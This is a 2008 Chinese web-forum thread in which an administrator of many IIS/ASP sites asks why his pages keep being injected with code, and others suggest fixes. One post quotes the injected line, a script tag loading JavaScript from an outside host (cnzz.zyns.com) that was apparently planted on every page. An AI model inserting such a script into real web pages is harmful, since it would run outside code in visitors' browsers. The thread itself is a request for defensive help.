找回密码
 立即注册
搜索
查看: 2428|回复: 18

IIS的漏洞简直太多了

[复制链接]

43

主题

1045

回帖

1440

积分

金牌会员

积分
1440
发表于 2008-5-7 23:58:16 | 显示全部楼层 |阅读模式
偶单位的网站服务器 环境是WIN2003  IIS+SQLserver  默认网站设的是所有网站放的大目录 ,简直跟遭瘟了一样,老是被挂码,只要是*.HTML ASP HTM 的页面全部被挂码,后来把文件全部设成只读,基本解决了问题,但是现在又被挂码了,并且不记录修改的时间,造孽呀。单位的客户网站很多,怎么办呀;!!

426

主题

4754

回帖

5265

积分

管理员

积分
5265
发表于 2008-5-8 09:10:48 | 显示全部楼层
代码漏洞自然要解决代码问题。
回复

使用道具 举报

43

主题

1045

回帖

1440

积分

金牌会员

积分
1440
 楼主| 发表于 2008-5-8 11:41:08 | 显示全部楼层
原帖由 erjing 于 2008-5-8 09:10 发表
代码漏洞自然要解决代码问题。



很多网站都是以前做的,代码太多了,又有静态 还有动态的
回复

使用道具 举报

29

主题

238

回帖

380

积分

中级会员

积分
380
发表于 2008-5-8 15:17:10 | 显示全部楼层
不是IIS烂,是代码烂
回复

使用道具 举报

43

主题

1045

回帖

1440

积分

金牌会员

积分
1440
 楼主| 发表于 2008-5-8 19:17:56 | 显示全部楼层
唉,建立成虚拟 目录是不是会好一些,偶现在的网站架构是,IIS的默认站点设成所有网站放的大目录里。没有设虚拟目录。烦躁的是,现在他们写码进来不说,还把,网站的编码全改了
回复

使用道具 举报

43

主题

1045

回帖

1440

积分

金牌会员

积分
1440
 楼主| 发表于 2008-5-8 19:26:28 | 显示全部楼层
<script language="JavaScript" src="http://cnzz.zyns.com/stat.js?id=4265203&web_id=4265203&show=pic" charset="gb2312" ></script>


他现在植入进来的代码是这个,请版主帮忙分析下,在每个页面的下面
回复

使用道具 举报

137

主题

2171

回帖

3071

积分

论坛元老

积分
3071
发表于 2008-5-8 19:45:37 | 显示全部楼层
原帖由 小詹 于 2008-5-8 15:17 发表
不是IIS烂,是代码烂


同意!很多单位都用,我们也用,没有出现这样的问题。
回复

使用道具 举报

43

主题

1045

回帖

1440

积分

金牌会员

积分
1440
 楼主| 发表于 2008-5-8 21:40:51 | 显示全部楼层
唉,太郁闷了,主要这个服务器上的网站太多了,100+左右,全部在一个目录下
回复

使用道具 举报

507

主题

2099

回帖

2149

积分

论坛元老

积分
2149
发表于 2008-5-9 14:14:06 | 显示全部楼层
装 麦咖啡,  自定义规则,禁止所有的  js  asp dll   ........   能增加一点挂马的成本~
日日深杯酒满,
朝朝小圃花开.
草堂春睡足,窗前日迟迟!
回复

使用道具 举报

964

主题

4038

回帖

6583

积分

网站编辑

灿灿他爸

积分
6583
发表于 2008-5-10 09:27:28 | 显示全部楼层
单位的服务器不能随便放网站,不相信的代码不能往上面放。
有些钱不能随便赚的
http://Www.RunMan.Cn

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|海浩社区

GMT+8, 2025-9-15 02:26 , Processed in 0.088721 second(s), 21 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表